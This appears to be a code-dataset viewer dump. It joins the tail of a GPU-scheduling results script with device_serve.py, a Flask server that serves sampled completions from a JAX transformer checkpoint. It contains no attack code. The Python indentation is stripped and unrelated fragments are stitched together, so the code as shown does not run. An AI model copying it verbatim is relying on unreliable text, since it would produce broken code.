json.dump(ovhd_total, fp3, sort_keys=True, indent=4)
with open(k80_1st_name, 'w') as fp3:
json.dump(k80_1st, fp3, sort_keys=True, indent=4)
with open(v100_1st_name, 'w') as fp3:
json.dump(v100_1st, fp3, sort_keys=True, indent=4)
with open(speedup_name, 'w') as fp1:
json.dump(speedup_dict, fp1, sort_keys=True, indent=4)
with open(predict_name, 'w') as fp1:
json.dump(predict_dict, fp1, sort_keys=True, indent=4)
with open(completion_name, 'w') as fp1:
json.dump(completion, fp1, sort_keys=True, indent=4)
gpu_usage_time = np.asarray(gpu_usage_time)
gpu_usage = np.asarray(gpu_usage)
gpu_usage_completion = np.asarray(gpu_usage_completion)
rows = zip(gpu_usage_time, gpu_usage, gpu_usage_completion)
with open(gpu_usage_name, 'w') as f:
writer = csv.writer(f)
for row in rows:
writer.writerow(row)
|
device_serve.py
|
import argparse
import json
import threading
import time
from queue import Queue, Empty
from copy import deepcopy
import jax
import numpy as np
import optax
from mesh_transformer import util
from mesh_transformer.checkpoint import read_ckpt
from mesh_transformer.sampling import nucleaus_sample
from mesh_transformer.transformer_shard import CausalTransformer
import transformers
from smart_open import open
from mesh_transformer.util import clip_by_global_norm
from flask import Flask, request, make_response, jsonify
app = Flask(__name__)
requests_queue = Queue()
"""
curl --header "Content-Type: application/json" \
--request POST \
--data '{"context":"eleutherai", "top_p": 1.0, "temp": 0.8, "gen_tokens": 64, "n": 8}' \
http://localhost:5000/complete
"""
def _build_cors_prelight_response():
response = make_response()
response.headers.add("Access-Control-Allow-Origin", "*")
response.headers.add('Access-Control-Allow-Headers', "*")
response.headers.add('Access-Control-Allow-Methods', "*")
return response
def _corsify_actual_response(response):
response.headers.add("Access-Control-Allow-Origin", "*")
return response
@app.route('/complete', methods=['POST', 'OPTIONS'])
def complete():
if request.method == "OPTIONS": # CORS preflight
return _build_cors_prelight_response()
elif request.method == "POST": # The actual request following the preflight
content = request.json
if requests_queue.qsize() > 100:
return {"error": "queue full, try again later"}
response_queue = Queue()
requests_queue.put(({
"context": content["context"],
"top_p": float(content["top_p"]),
"temp": float(content["temp"]),
"gen_tokens": int(content["gen_tokens"]),
"n": int(content["n"])
}, response_queue))
completions = [response_queue.get()]
while not response_queue.empty():
completions.append(response_queue.get())
return _corsify_actual_response(jsonify({"completion": completions}))
else:
raise RuntimeError("Weird - don't know how to handle method {}".format(request.method))
def parse_args():
# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument("--config", type=str, default=None, help="Config file location")
args = parser.parse_args()
return args
if __name__ == "__main__":
threading.Thread(target=app.run, kwargs={"port": 5000, "host": "0.0.0.0"}).start()
args = parse_args()
params = json.load(open(args.config))
gradient_accumulation_steps = params.get("gradient_accumulation_steps", 1)
per_replica_batch = params["per_replica_batch"]
cores_per_replica = params["cores_per_replica"]
assert cores_per_replica <= 8
bucket = params["bucket"]
model_dir = params["model_dir"]
layers = params["layers"]
d_model = params["d_model"]
n_heads = params["n_heads"]
n_vocab = params["n_vocab"]
seq = params["seq"]
norm = params["norm"]
params["sampler"] = nucleaus_sample
opt = optax.chain(
optax.scale(1 / gradient_accumulation_steps),
clip_by_global_norm(1),
optax.scale_by_adam(),
optax.additive_weight_decay(0),
optax.scale(-1),
optax.scale_by_schedule(util.gpt3_schedule(0, 1, 0, 0))
)
params["optimizer"] = opt
start = time.time()
print(f"jax devices: {jax.device_count()}")
print(f"jax runtime initialized in {time.time() - start:.06}s")
mesh_shape = (jax.device_count() // cores_per_replica, cores_per_replica)
devices = np.array(jax.devices()).reshape(mesh_shape)
with open(f"gs://{bucket}/{model_dir}/meta.json", "r") as f:
meta = json.load(f)
ckpt_step = meta["checkpoints"][-1]
print(f"using checkpoint {ckpt_step}")
total_batch = per_replica_batch * jax.device_count() // cores_per_replica * 8
with jax.experimental.maps.mesh(devices, ('dp', 'mp')):
network = CausalTransformer(params)
start = time.time()
network.state = read_ckpt(network.state, f"gs://{bucket}/{model_dir}/step_{ckpt_step}/", devices.shape[1])
print(f"network loaded in {time.time() - start:.06}s")
local_shards = max(jax.local_device_count() // mesh_shape[1], 1)
del network.state["opt_state"]
network.state = network.move_xmap(network.state, np.zeros(local_shards))
tokenizer = transformers.GPT2TokenizerFast.from_pretrained('gpt2')
while True:
all_ctx = []
all_q = []
try:
o, q = requests_queue.get(block=False)
n = o["n"]
context = o["context"]
top_p = o["top_p"]
temp = o["temp"]
gen_tokens = o["gen_tokens"]
# all_ctx = n * [context]
# all_top_p = n * [top_p]
# all_temp = n * [temp]
all_q = n * [q]
except Empty:
if len(all_ctx):
break
else:
time.sleep(0.01)
if not all_q:
continue
start = time.time()
padded_tokens = np.zeros(seq).astype(np.uint32)
length = 0
try:
tokens = tokenizer.encode(context)
provided_ctx = len(tokens)
pad_amount = seq - provided_ctx
pad_amount = max(pad_amount, 0)
padded_tokens = np.pad(tokens, ((pad_amount, 0),)).astype(np.uint32)[-seq:]
length = len(tokens)
except:
print("oops exception")
sequences = []
log_probs_for_sequences = []
single_generation_batch = 8 if n > 8 else n
for i in range(n // single_generation_batch):
all_tokenized = []
all_length = []
all_top_p = []
all_temp = []
for _ in range(single_generation_batch):
all_tokenized.append(deepcopy(padded_tokens))
all_length.append(length)
all_top_p.append(top_p)
all_temp.append(temp)
output = network.generate(np.array(all_tokenized),
np.array(all_length),
gen_tokens,
{
"top_p": np.array(all_top_p),
"temp": np.array(all_temp)
},
return_logits=True)
log_probs = np.squeeze(jax.nn.log_softmax(output[1][2], -1))
indices = output[1][0]
selected_log_probs = np.squeeze(np.take_along_axis(log_probs, indices, axis=2))
for o, slp in zip(output[1][0][:, :, 0], selected_log_probs):
sequences.append(tokenizer.convert_ids_to_tokens(o))
log_probs_for_sequences.append(slp.tolist())
for o, q, slp in zip(sequences, all_q, log_probs_for_sequences):
q.put((o, slp))
# q.put((tokenizer.decode(o), slp.tolist()))
print(f"completion done in {time.time() - start:06}s")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.